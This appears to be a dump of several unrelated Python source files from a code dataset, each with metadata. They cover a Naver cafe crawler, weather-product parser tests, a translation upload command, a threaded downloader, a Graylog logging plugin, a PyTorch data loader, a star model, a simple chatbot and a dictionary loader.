driver.find_element_by_name('pw')\ntag_id.clear()\ndriver.implicitly_wait(1)\n\ndriver.execute_script(\"document.getElementsByName('id')[0].value='아이디'\")\ndriver.implicitly_wait(1)\n\ndriver.execute_script(\"document.getElementsByName('pw')[0].value='비밀번호'\")\ndriver.implicitly_wait(1)\n\n# click the login button\ndriver.find_element_by_xpath('//*[@id=\"frmNIDLogin\"]/fieldset/input').click()\ndriver.implicitly_wait(1)\nprint(\"Login Completion\")\n\n# collect article links from the cafe\ndef crawling_new_url(cafe_url):\n    print(\"URL Crawling Start\")\n    article_url = []\n    append = article_url.append\n    for url in cafe_url:\n        print(url)\n        driver.get(url)\n        driver.implicitly_wait(3)\n        driver.switch_to.frame(\"cafe_main\")\n        while 1:\n            check = 1\n            page_bar = driver.find_elements_by_css_selector('.prev-next > a')\n            page = []\n            for e in page_bar:\n                if e.text != '이전':\n                    page.append(e.text)\n\n            print(\"page: \", page)\n            for i in page:\n                html = driver.page_source\n                soup = BeautifulSoup(html, 'html.parser')\n                article_list = soup.find_all('div', class_='article-board m-tcol-c')[1].find_all('a', class_='article')\n\n                for j in range(len(article_list)):\n                    element = article_list[j].get('href')\n                    append('https://cafe.naver.com' + element)\n\n                try:\n                    # move to the next page\n                    if check == len(page):\n                        check = 'stop'\n                        break\n                    elif (int(i) % 10) == 0:\n                        driver.find_element_by_link_text('다음').click()\n                        driver.implicitly_wait(3)\n                    else:\n                        driver.find_element_by_link_text(str(int(i) + 1)).click()\n                        check += 1\n                        driver.implicitly_wait(3)\n                except Exception as error: # retry if the page failed to load\n                    print(error)\n                    pass\n            if check == 'stop':\n                break\n        print('--> ', len(article_url), article_url)\n    print(\"URL Crawling Completion\")\n    return 
article_url\n\n","sub_path":".ipynb_checkpoints/Crawler-checkpoint.py","file_name":"Crawler-checkpoint.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"194329145","text":"\"\"\"Testing!\"\"\"\nimport unittest\nimport datetime\nimport os\n\nimport pytz\n\nfrom pyiem.nws import product, ugc\nfrom pyiem.nws.product import WMO_RE\nfrom pyiem.nws.product import TextProductException\nfrom pyiem.nws.products import parser as productparser\n\n\ndef get_file(name):\n ''' Helper function to get the text file contents '''\n basedir = os.path.dirname(__file__)\n fn = \"%s/../../../data/product_examples/%s\" % (basedir, name)\n return open(fn, 'rb').read().decode('utf-8')\n\n\ndef utc(year, month, day, hour=0, minute=0):\n \"\"\"UTC Timestamp generator\"\"\"\n return datetime.datetime(year, month, day, hour,\n minute).replace(tzinfo=pytz.timezone(\"UTC\"))\n\n\nclass TestProduct(unittest.TestCase):\n \"\"\"Test Products\"\"\"\n maxDiff = None\n\n def test_170411_fakemnd(self):\n \"\"\"This RTP has a quasi-faked timestamp in the header causing error\"\"\"\n tp = productparser(get_file('RTPSGX.txt'))\n res = utc(2017, 4, 10, 23, 30)\n self.assertEqual(tp.valid, res)\n\n def test_151024_cae(self):\n \"\"\"Make sure this CAE product works and does not throw an UGC error\"\"\"\n tp = productparser(get_file('CAEIA.txt'))\n self.assertEquals(tp.afos, 'CAEIA')\n\n def test_resent(self):\n \"\"\" Make sure we can tell a ...RESENT product \"\"\"\n tp = productparser(get_file('MWWBRO.txt'))\n self.assertTrue(tp.is_resent())\n\n def test_wmoheader(self):\n \"\"\"\" Make sure we can handle some header variations \"\"\"\n ar = [\"FTUS43 KOAX 102320 \",\n \"FTUS43 KOAX 102320 COR \",\n \"FTUS43 KOAX 102320 COR \",\n \"FTUS43 KOAX 102320\",\n ]\n for item in ar:\n self.assertTrue(WMO_RE.match(item) is not None)\n\n def test_rfd(self):\n \"\"\" Parse a RFD \"\"\"\n tp = productparser(get_file('RFDOAX.txt'))\n self.assertEqual(tp.get_channels()[0], 'RFDOAX')\n j = tp.get_jabbers('http://localhost')\n self.assertEqual(j[0][0], (\n 'OAX issues Grassland Fire Danger '\n '(RFD) at Jan 19, 4:10 AM CST ...MODERATE FIRE DANGER TODAY... 
'\n 'http://localhost?pid=201501191010-KOAX-FNUS63-RFDOAX'))\n\n def test_hwo(self):\n \"\"\" Parse a HWO \"\"\"\n tp = productparser(get_file('HWO.txt'))\n self.assertEqual(tp.get_channels()[0], 'HWOLOT')\n j = tp.get_jabbers('http://localhost')\n self.assertEqual(j[0][0], (\n 'LOT issues Hazardous Weather Outlook '\n '(HWO) at Jan 8, 3:23 PM CST '\n 'http://localhost?pid=201301082123-KLOT-FLUS43-HWOLOT'))\n\n def test_140710_wmoheader_fail(self):\n \"\"\" Make sure COR in WMO header does not trip us up\"\"\"\n tp = product.TextProduct(get_file('MANANN.txt'))\n self.assertEqual(tp.afos, 'MANANN')\n self.assertTrue(tp.is_correction())\n\n def test_now_jabber(self):\n ''' See if we can process a NOW and get the jabber result '''\n tp = product.TextProduct(get_file('NOWDMX.txt'))\n j = tp.get_jabbers(\"http://localhost\")\n self.assertEqual(j[0][0],\n (\"DMX issues Short-term Forecast (NOW) \"\n \"at Mar 4, 8:42 AM CST \"\n \"http://localhost?\"\n \"pid=201003041442-KDMX-FPUS73-NOWDMX\"))\n\n def test_nomnd_with_timestamp(self):\n ''' Make sure we process timestamps correctly when there is no MND'''\n utcnow = datetime.datetime(2013, 12, 31, 18, 0)\n utcnow = utcnow.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('MAVWC0.txt'), utcnow=utcnow)\n ts = datetime.datetime(2014, 1, 1, 0, 0)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n self.assertEqual(tp.valid, ts)\n\n def test_empty(self):\n \"\"\" see what happens when we send a blank string \"\"\"\n self.assertRaises(TextProductException, product.TextProduct, \"\")\n\n def test_invalid_mnd_date(self):\n \"\"\" Check parsing of timestamp \"\"\"\n answer = datetime.datetime(2013, 1, 3, 6, 16)\n answer = answer.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('CLI/CLINYC.txt'))\n self.assertEqual(tp.valid, answer)\n\n def test_ugc_error130214(self):\n \"\"\" Check parsing of SPSJAX \"\"\"\n tp = product.TextProduct(get_file('SPSJAX.txt'))\n self.assertEqual(tp.segments[0].ugcs, [ugc.UGC(\"FL\", \"Z\", 23),\n ugc.UGC(\"FL\", \"Z\", 25),\n ugc.UGC(\"FL\", \"Z\", 30),\n ugc.UGC(\"FL\", \"Z\", 31),\n ugc.UGC(\"FL\", \"Z\", 32)\n ])\n\n def test_no_ugc(self):\n \"\"\" Product that does not have UGC encoding \"\"\"\n data = get_file('CCFMOB.txt')\n tp = product.TextProduct(data)\n self.assertEqual(len(tp.segments[0].ugcs), 0)\n\n def test_ugc_invalid_coding(self):\n \"\"\" UGC code regression \"\"\"\n data = get_file('FLW_badugc.txt')\n tp = product.TextProduct(data)\n # self.assertRaises(ugc.UGCParseException, product.TextProduct, data )\n self.assertEqual(len(tp.segments[0].ugcs), 0)\n\n def test_000000_ugctime(self):\n \"\"\" When there is 000000 as UGC expiration time \"\"\"\n tp = product.TextProduct(get_file('RECFGZ.txt'))\n self.assertEqual(tp.segments[0].ugcexpire, None)\n\n def test_stray_space_in_ugc(self):\n \"\"\" When there are stray spaces in the UGC! 
\"\"\"\n tp = product.TextProduct(get_file('RVDCTP.txt'))\n self.assertEqual(len(tp.segments[0].ugcs), 28)\n\n def test_ugc_in_hwo(self):\n \"\"\" Parse UGC codes in a HWO \"\"\"\n tp = product.TextProduct(get_file('HWO.txt'))\n self.assertEqual(tp.segments[1].ugcs, [ugc.UGC(\"LM\", \"Z\", 740),\n ugc.UGC(\"LM\", \"Z\", 741),\n ugc.UGC(\"LM\", \"Z\", 742),\n ugc.UGC(\"LM\", \"Z\", 743),\n ugc.UGC(\"LM\", \"Z\", 744),\n ugc.UGC(\"LM\", \"Z\", 745)\n ])\n\n def test_afos(self):\n \"\"\" check AFOS PIL Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.afos, 'AFDBOX')\n\n def test_source(self):\n \"\"\" check tp.source Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.source, 'KBOX')\n\n def test_wmo(self):\n \"\"\" check tp.wmo Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.wmo, 'FXUS61')\n\n def test_notml(self):\n \"\"\" check TOR without TIME...MOT...LOC \"\"\"\n tp = product.TextProduct(get_file('TOR.txt'))\n self.assertEqual(tp.segments[0].tml_dir, None)\n\n def test_signature(self):\n \"\"\" check svs_search \"\"\"\n tp = product.TextProduct(get_file('TOR.txt'))\n self.assertEqual(tp.get_signature(), \"CBD\")\n\n def test_spanishMWW(self):\n \"\"\" check spanish MWW does not break things \"\"\"\n tp = product.TextProduct(get_file('MWWspanish.txt'))\n self.assertEqual(tp.z, None)\n\n def test_svs_search(self):\n \"\"\" check svs_search \"\"\"\n tp = product.TextProduct(get_file('TOR.txt'))\n self.assertEqual(tp.segments[0].svs_search(),\n (\"* AT 1150 AM CDT...THE NATIONAL WEATHER SERVICE \"\n \"HAS ISSUED A TORNADO WARNING FOR DESTRUCTIVE \"\n \"WINDS OVER 110 MPH IN THE EYE WALL AND INNER RAIN \"\n \"BANDS OF HURRICANE KATRINA. THESE WINDS WILL \"\n \"OVERSPREAD MARION...FORREST AND LAMAR COUNTIES \"\n \"DURING THE WARNING PERIOD.\"))\n\n def test_product_id(self):\n \"\"\" check valid Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n self.assertEqual(tp.get_product_id(),\n \"201211270001-KBOX-FXUS61-AFDBOX\")\n\n def test_valid(self):\n \"\"\" check valid Parsing \"\"\"\n tp = product.TextProduct(get_file('AFD.txt'))\n ts = datetime.datetime(2012, 11, 27, 0, 1)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n self.assertEqual(tp.valid, ts)\n\n def test_FFA(self):\n \"\"\" check FFA Parsing \"\"\"\n tp = product.TextProduct(get_file('FFA.txt'))\n self.assertEqual(tp.segments[0].get_hvtec_nwsli(), \"NWYI3\")\n\n def test_valid_nomnd(self):\n \"\"\" check valid (no Mass News) Parsing \"\"\"\n utcnow = datetime.datetime(2012, 11, 27, 0, 0)\n utcnow = utcnow.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('AFD_noMND.txt'),\n utcnow=utcnow)\n ts = datetime.datetime(2012, 11, 27, 0, 1)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n self.assertEqual(tp.valid, ts)\n\n def test_headlines(self):\n \"\"\" check headlines Parsing \"\"\"\n tp = product.TextProduct(get_file('AFDDMX.txt'))\n self.assertEqual(tp.segments[0].headlines,\n ['UPDATED FOR 18Z AVIATION DISCUSSION',\n 'Bogus second line with a new line'])\n\n def test_tml(self):\n \"\"\" Test TIME...MOT...LOC parsing \"\"\"\n ts = datetime.datetime(2012, 5, 31, 23, 10)\n ts = ts.replace(tzinfo=pytz.timezone(\"UTC\"))\n tp = product.TextProduct(get_file('SVRBMX.txt'))\n self.assertEqual(tp.segments[0].tml_dir, 238)\n self.assertEqual(tp.segments[0].tml_valid, ts)\n self.assertEqual(tp.segments[0].tml_sknt, 39)\n self.assertEqual(tp.segments[0].tml_giswkt,\n 'SRID=4326;POINT(-88.53 
32.21)')\n\n def test_bullets(self):\n \"\"\" Test bullets parsing \"\"\"\n tp = product.TextProduct(get_file('TORtag.txt'))\n self.assertEqual(len(tp.segments[0].bullets), 4)\n self.assertEqual(tp.segments[0].bullets[3],\n (\"LOCATIONS IMPACTED INCLUDE... MARYSVILLE...LOVILIA\"\n \"...HAMILTON AND BUSSEY.\"))\n\n tp = product.TextProduct(get_file('FLSDMX.txt'))\n self.assertEqual(len(tp.segments[2].bullets), 7)\n self.assertEqual(tp.segments[2].bullets[6],\n (\"IMPACT...AT 35.5 FEET...WATER AFFECTS 285TH \"\n \"AVENUE NEAR SEDAN BOTTOMS...OR JUST EAST OF THE \"\n \"INTERSECTION OF 285TH AVENUE AND 570TH STREET.\"))\n\n def test_tags(self):\n \"\"\" Test tags parsing \"\"\"\n tp = product.TextProduct(get_file('TORtag.txt'))\n self.assertEqual(tp.segments[0].tornadotag, \"OBSERVED\")\n self.assertEqual(tp.segments[0].tornadodamagetag, \"SIGNIFICANT\")\n\n def test_longitude_processing(self):\n ''' Make sure that parsed longitude values are negative! '''\n tp = product.TextProduct(get_file('SVRBMX.txt'))\n self.assertAlmostEqual(tp.segments[0].sbw.exterior.xy[0][0], -88.39, 2)\n\n def test_giswkt(self):\n \"\"\" Test giswkt parsing \"\"\"\n tp = product.TextProduct(get_file('SVRBMX.txt'))\n self.assertAlmostEqual(tp.segments[0].sbw.area, 0.16, 2)\n\n self.assertEqual(tp.segments[0].giswkt,\n ('SRID=4326;MULTIPOLYGON '\n '(((-88.390000 32.590000, -88.130000 32.760000, '\n '-88.080000 32.720000, -88.110000 32.690000, '\n '-88.040000 32.690000, -88.060000 32.640000, '\n '-88.080000 32.640000, -88.060000 32.590000, '\n '-87.930000 32.630000, -87.870000 32.570000, '\n '-87.860000 32.520000, -87.920000 32.520000, '\n '-87.960000 32.470000, -88.030000 32.430000, '\n '-88.050000 32.370000, -87.970000 32.350000, '\n '-87.940000 32.310000, -88.410000 32.310000, '\n '-88.390000 32.590000)))'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pyiem/nws/tests/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":12192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"551184784","text":"from Products.CMFCore.utils import getToolByName\nPROFILE = 'profile-webcouturier.dropdownmenu:default'\n\n\ndef common(context):\n setup = getToolByName(context, 'portal_setup')\n setup.runAllImportStepsFromProfile(PROFILE)\n\n\ndef upgrade_1000_to_1010(context):\n \"\"\"If dropdownmenu_sunburst is after dropdownmenu in sunburst skin,\n reorder them\"\"\"\n skin = getToolByName(context, 'portal_skins')\n layers = skin.getSkinPath('Sunburst Theme').split(',')\n dds = layers.index('dropdownmenu_sunburst')\n dd = layers.index('dropdownmenu')\n if dds > dd:\n #switch them\n layers[dd] = 'dropdownmenu_sunburst'\n layers[dds] = 'dropdownmenu'\n path = ','.join(layers)\n skin.testSkinPath(path)\n sels = skin._getSelections()\n sels['Sunburst Theme'] = path\n","sub_path":"buildout-cache/eggs/webcouturier.dropdownmenu-2.3.1-py2.7.egg/webcouturier/dropdownmenu/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"213360040","text":"import os\nimport glob\nimport json\n\nimport requests\nfrom django.core.management.base import BaseCommand\nfrom django.utils.crypto import get_random_string\n\nfrom langusta_client import app_settings\nfrom langusta_client.exceptions import NoPoFilesFound\n\nfrom optparse import make_option\n\nIMPORT_ID_LENGTH = 40\n\n\nclass Command(BaseCommand):\n option_list = 
BaseCommand.option_list + (\n        make_option(\n            \"-H\", \"--host\", action=\"store\", type=\"string\", dest=\"host\"\n        ),\n        make_option(\n            \"-W\", \"--auth-token\", action=\"store\", type=\"string\", dest=\"token\"\n        ),\n        make_option(\n            \"-P\", \"--project-token\", action=\"store\", type=\"string\", dest=\"project\"\n        ),\n        make_option(\n            \"-D\", \"--dry-run\", action=\"store_true\", dest=\"dry_run\", default=False\n        ),\n        make_option(\n            \"-t\", \"--tag\", action=\"store\", type=\"string\", dest=\"tag\", default='master'\n        ),\n        make_option(\n            \"-A\", \"--actualize\", action=\"store_true\", dest=\"actualize\", default=False\n        )\n    )\n\n    def handle(self, *args, **options):\n        self.debug = bool(options.get('dry_run'))\n        self.env_tag = options.get('tag', '')\n        self.actualize = options.get('actualize')\n        self.upload_translation_file()\n\n    @property\n    def url(self):\n        return \"{}/api/import/{}/{}/\".format(\n            app_settings.LANGUSTA['HOST'],\n            app_settings.LANGUSTA['PROJECT_SLUG'],\n            app_settings.LANGUSTA['PROJECT_TOKEN']\n\n        )\n\n    def upload_translation_file(self):\n        files = []\n        for lang in app_settings.LANGUSTA['LANGUAGES']:\n            source_folder = os.path.join(\n                app_settings.LANGUSTA['SOURCE_PATH'], lang, 'LC_MESSAGES'\n            )\n            files += [filepath for filepath in glob.glob(source_folder + '/*.po')]\n        if not files:\n            raise NoPoFilesFound(\n                'Could not find any .po files in %r' % (source_folder,)\n            )\n        print('Translations found:\\n', '\\n'.join(files))\n\n        # Used to group all translations as one import event\n        langusta_import_id = get_random_string(IMPORT_ID_LENGTH)\n\n        for _filePath in files:\n            filePath, domain = os.path.split(_filePath)\n            language = filePath.split('/')[-2]\n            print('Uploading, language: {}, domain: {}'.format(language,\n                                                               domain))\n\n            content = open(_filePath, 'r').read()\n            data = {\n                'project_slug': app_settings.LANGUSTA['PROJECT_SLUG'],\n                'content': content,\n                'tags': [self.env_tag],\n                'domain': domain,\n                'language': language,\n                'import_id': langusta_import_id,\n                'actualize': self.actualize,\n            }\n\n            headers = {\n                'content-type': 'application/json',\n                'Authorization': 'Token {}'.format(app_settings.LANGUSTA['AUTH_TOKEN'])\n            }\n\n            if not self.debug:\n                response = requests.post(\n                    self.url,\n                    data=json.dumps(data), headers=headers\n                )\n                try:\n                    response.raise_for_status()\n                except IOError:\n                    if response.headers.get('content-type') == 'application/json':\n                        print(response.json())\n                    raise\n","sub_path":"langusta_client/management/commands/ln_push.py","file_name":"ln_push.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"224135661","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 13/03/2018 10:32 AM\n# @Author : Fish\n# @Site : \n# @File : download.py\n# @Software: PyCharm\n\nimport threading\nimport requests\nfrom component import proxy, utility\n\n\nclass Downloader(object):\n    def __init__(self,video_name,url):\n        proxy.set_proxy()\n        self.dir_name = utility.mk_download_dir()\n        self.name = video_name + '.mp4'\n        self.url = url\n        self.num = 8\n        session = requests.Session()\n        r = session.get(self.url, headers=utility.set_header())\n        # get the total file size\n        self.total = int(r.headers['Content-Length'])\n        print('total size: ',self.total)\n\n    # work out the byte range each download thread handles\n    def get_range(self):\n        ranges = []\n        offset = int(self.total/self.num)\n        for i in range(self.num):\n            if i == self.num-1:\n                ranges.append((i*offset,''))\n            else:\n                ranges.append((i*offset,(i+1)*offset))\n        return ranges # [(0,100),(100,200),(200,\"\")]\n\n    # 
download a chunk of the file, given its start and end byte positions\n    def download(self,start,end):\n        headers = {'Range':'Bytes=%s-%s'%(start,end),'Accept-Encoding':'*'}\n        mxheader = utility.set_header()\n        headers.update(mxheader)\n        # print(headers)\n        res = requests.get(self.url,headers=headers)\n        print (\"%s-%s download success\"%(start,end))\n        # move the file pointer to the start of this chunk\n        self.fd.seek(start)\n        self.fd.write(res.content)\n\n    def run(self):\n        self.fd = open(self.dir_name + '/' + self.name,\"wb\")\n\n        thread_list = []\n        n = 0\n\n        for ran in self.get_range():\n            # unpack the byte range this thread will download\n            start,end = ran\n            n += 1\n            thread = threading.Thread(target=self.download,args=(start,end))\n            thread.start()\n            thread_list.append(thread)\n\n        for i in thread_list:\n            # wait for every thread, so a later chunk cannot seek the file before the previous one is written\n            i.join()\n\n        self.fd.close()\n\nif __name__ == \"__main__\":\n    # example invocation; the name and URL below are placeholders\n    Downloader(\"video\", \"http://example.com/video.mp4\").run()\n","sub_path":"component/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"69723664","text":"\"\"\"\n=================================\n\nThis file is from the Greylog plugin for NavalBot.\nCopyright (C) 2016 Isaac Dickinson\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see <http://www.gnu.org/licenses/>\n\n=================================\n\"\"\"\n\n# Graylog plugin.\n# Sends JSON logs to Graylog.\nimport logging\nimport json\nimport asyncio\n\nfrom navalbot.api import hooks, util\n\nVERSION = \"1.0.0\"\n\nlogger = logging.getLogger(\"NavalBot\")\n\ngraylog_params = util.get_global_config(\"graylog\")\naddr, port = graylog_params[\"addr\"], graylog_params[\"port\"]\n\np = {\"r\": None, \"w\": None}\n\n\nasync def send(data: str):\n    if not p[\"r\"]:\n        try:\n            p[\"r\"], p[\"w\"] = await asyncio.open_connection(addr, port)\n        except ConnectionRefusedError:\n            logger.critical(\"Could not connect to Graylog on {}!\".format((addr, port)))\n            return\n        else:\n            logger.info(\"Established connection to Graylog.\")\n    # write\n    data += \"\\n\"\n    p[\"w\"].write(data.encode())\n\n\n@hooks.on_generic_event\nasync def send_to_graylog(data: dict):\n    \"\"\"\n    Sends something to Graylog.\n\n    Encodes the data into json.\n    \"\"\"\n    # Flatten out the data.\n    new_d = data.get(\"d\", {})\n    # Add an 'event' param\n    new_d['event'] = data.get('t', \"ERR_UNKNOWN\")\n    # json encode it\n    to_send = json.dumps(new_d)\n    # Send the data.\n    await send(to_send)\n    logger.info(\"Sent `{}` to Graylog.\".format(new_d['event']))\n    # Close the old connection\n","sub_path":"nsa.py","file_name":"nsa.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"644419173","text":"from torch.utils import data\n\n\ndef run_pipeline(in_dict, pipeline):\n    \"\"\"\n    Run every method in the pipeline in order.\n    :param in_dict: a dict holding the pipeline input (the in_key of the first method is enough)\n    :param pipeline: the pipeline to execute\n    :return: a dict, i.e. the output of the last method in the pipeline\n    \"\"\"\n    # copy the entries named by the first method's in_key into a fresh dict\n    tmp_dict = {}\n    for _key 
in pipeline[0]['in_key']:\n        tmp_dict[_key] = in_dict[_key]\n    for method in pipeline:\n        if method['method'] is not None:\n            tmp_dict = method['method'](**tmp_dict)\n        else: # a None method only passes values through (or renames them)\n            _tmp_dict = {}\n            for _index, _key in enumerate(method['out_key']):\n                _tmp_dict[_key] = tmp_dict[method['in_key'][_index]]\n            tmp_dict = _tmp_dict\n    return tmp_dict\n\ndef chechout_pipeline(pipeline):\n    \"\"\"\n    Check that the methods in the pipeline are consistent, i.e. that their inputs and outputs chain together.\n    If a method is None it only passes values through, so its in_key and out_key must match.\n    :param pipeline:\n    :return:\n    \"\"\"\n    step_num = len(pipeline)\n    # first, check that inputs and outputs chain together\n    for index in range(step_num-1):\n        method = pipeline[index]\n        next_method = pipeline[index+1]\n        # print('checking method: t method ',str(method['method']),\n        #       ' t+1 method ', str(next_method['method']))\n        if method['out_key'] != next_method['in_key']:\n            raise ValueError('out_keys do not match in_key')\n    # second, check that None methods have the same number of in and out keys\n    for method in pipeline:\n        if method['method'] is None:\n            if len(method['in_key']) != len(method['out_key']):\n                raise ValueError('None_method must have the same length of in_key and out_keys')\n    return 1\n\n\nclass wama_dataset(data.Dataset):\n    def __init__(self, input_dict_list, pipeline_list):\n        \"\"\"\n        :param input_dict_list: a list in which each element is one sample\n        :param pipeline_list: a list made of several pipelines, executed one after another\n        :param mode:\n        \"\"\"\n\n        self.input_dict_list = input_dict_list\n        self.pipeline_list = pipeline_list\n\n    def __len__(self):\n        return len(self.input_dict_list)\n\n    def __getitem__(self, index):\n        # fetch one sample\n        indict = self.input_dict_list[index]\n        # build the return value up front, also a dict\n        out_dict = {}\n        # run each pipeline in pipeline_list in turn\n        for pipeline in self.pipeline_list:\n            # validate the pipeline\n            chechout_pipeline(pipeline)\n            # execute the pipeline\n            tmp_dict = run_pipeline(in_dict=indict, pipeline=pipeline)\n            # store the results (or overwrite some results of earlier pipelines)\n            out_dict.update(tmp_dict)\n\n        # note: every value in out_dict may only be a string, a number or an array (a torch restriction) - check this yourself\n        return out_dict\n\n\n\ndef get_loader(input_dict_list, pipeline_list, num_workers = 0, pin_memory=False, batch_size = 3, drop_last = True):\n    dataset = wama_dataset(input_dict_list=input_dict_list, pipeline_list=pipeline_list)\n    data_loader = data.DataLoader(dataset=dataset,\n                                  batch_size=batch_size,\n                                  shuffle=True,\n                                  num_workers=num_workers,\n                                  drop_last=drop_last,\n                                  pin_memory=pin_memory)\n    return data_loader\n","sub_path":"proj/wama/data_loader_beta.py","file_name":"data_loader_beta.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"4074084","text":"# Written 23/05/17 by dh4gan\n# Class for the Sail Object\n\nimport vector\nfrom numpy import cos\n\n# Some useful physical constants\n\nAU = (149.6e6 * 1000)\n\n# Sun\nsun_radius = 695700000 # [m]\nsun_mass = 1.989 * 10**30 # [kg]\nsun_luminosity = 3.86 * 10**26 # [Watt] stellar luminosity\nsun_Bfield_1AU = 5.0e-9 # Solar magnetic field strength at 1 AU (Tesla)\n\n# CenA:\nL_star_CenA = sun_luminosity * 1.522\nR_star_CenA = sun_radius * 1.224\nM_star_CenA = sun_mass * 1.105\n\n# CenB:\nL_star_CenB = sun_luminosity * 0.503\nR_star_CenB = sun_radius * 0.863\nM_star_CenB = sun_mass * 0.934\n\n# CenC:\nL_star_CenC = sun_luminosity * 138 * 10e-6\nR_star_CenC = sun_radius * 0.145\nM_star_CenC = sun_mass * 0.123\n\n\n\nclass Star(object):\n    \n    \n    def __init__(self,m,R,L,B,pos,vel,magmom=vector.Vector3D(0.0,0.0,1.0)):\n        '''Initialises star with mass, radius, B-field, position, velocity'''\n        self.M = m\n        self.R = R\n        self.L = L\n        self.B1AU = B\n        self.position = pos\n        
self.velocity = vel\n        self.magmoment = magmom\n    \n    def __str__(self):\n        s= 'Star: mass %e radius %e luminosity %e\\n' % (self.M/sun_mass, self.R/sun_radius, self.L/sun_luminosity)\n        s = s+\"Position: \"+str(self.position)+\"\\n\"\n        s = s+\"Velocity: \"+str(self.velocity)+\"\\n\"\n        s = s+\"Mag Moment: \"+str(self.magmoment)+\"\\n\"\n        return s\n    \n    def get_magnetic_field_dipole(self,position):\n        '''Returns a spherically symmetric dipole magnetic field\n        NB: Calculated in 3D'''\n\n        sepvector = position.subtract(self.position).scalarmult(1.0/AU)\n        \n        sep = sepvector.mag()\n        sep2 = sep*sep\n        sep3 = sep2*sep\n        \n        sepvector = sepvector.unitVector()\n        \n        mdotr = self.magmoment.dot(sepvector)\n        \n        prefac = self.B1AU/sep3\n        \n        Bfield = sepvector.scalarmult(3.0*prefac*mdotr)\n        Bfield = Bfield.subtract(self.magmoment.scalarmult(prefac))\n\n        return Bfield\n    \n    \n    ","sub_path":"star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"644438761","text":"import json\nimport random\n\nwith open(\"data.json\") as file:\n    data = json.load(file)\n\ndef stringify(string):\n    # This function removes characters that are inside 'unwanted_chars' from the 'string' argument\n    word = []\n    newString = \"\"\n    unwanted_chars = [\"!\", \"?\", \".\", \",\", \"(\", \")\", \"&\", \";\", '\"', \"'\", \"@\"]\n    stringLength = len(string)\n\n    for char in string:\n        word.append(char)\n        for unwanted_char in unwanted_chars:\n            if unwanted_char in word:\n                stringLength -= len(unwanted_char)\n                index = word.index(unwanted_char)\n                word.pop(index)\n\n    for char in word:\n        newString += char\n    return newString # ==> newString is the string with all those symbols removed\n\nrunning = True\nwhile running:\n    userInput = input('> ')\n    userInput = stringify(userInput)\n    print(userInput)\n    response = \"\"\n    for dict in data['data']:\n        for pattern in dict['input_pattern']:\n            if userInput == pattern:\n                resp = random.choice(dict['response'])\n                print(resp)\n\n    if userInput in data[\"exit\"][\"exit_pattern\"]:\n        running = False\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"592844832","text":"# -*- coding:utf-8 -*-\n\nimport uuid\n\nfrom .fs import read_file\nfrom .date import now\nfrom .date import timestamp\n\n\ndef load_data(file):\n    u\"\"\"Load data from a file\n\n    Parameters\n    ----------\n    file : str\n        path to the file\n\n    Returns\n    -------\n    list\n\n    \"\"\"\n    text = read_file(file)\n\n    if text is None:\n        return []\n\n    lines = text.split(\"\\n\")\n\n    return [line.strip() for line in lines if line.strip() != \"\"]\n\n\ndef load_dict(file, mode=\"list\"):\n    u\"\"\"Load a word dictionary\n\n    Parameters\n    ----------\n    file : str\n        path to the file\n    mode : {\"list\", \"set\"}, optional, default=\"list\"\n        return type\n\n    Returns\n    -------\n    {list, set}\n\n    [\"啊\", \"呀\"]\n    {\"啊\", \"呀\"}\n\n    \"\"\"\n    words = load_data(file)\n\n    if mode == \"set\":\n        words = set(words)\n\n    return words\n\n\ndef load_syn_dict(file, mode=\"list\"):\n    u\"\"\"Load a synonym (replacement) dictionary\n\n    Parameters\n    ----------\n    file : str\n        path to the file\n    mode : {\"list\", \"set\"}, optional, default=\"list\"\n        return type\n\n    Returns\n    -------\n    {[[str]], {str : set}}\n\n    \"\"\"\n    lines = load_data(file)\n\n    if mode == \"set\":\n        syn_dict = {}\n\n        for line in lines:\n            line_splited = line.split()\n            word = line_splited[0]\n            if word not in syn_dict:\n                syn_dict[word] = set()\n            syn_dict[word] = syn_dict[word] | set(line_splited[1:]) # union the sets when a key repeats\n    
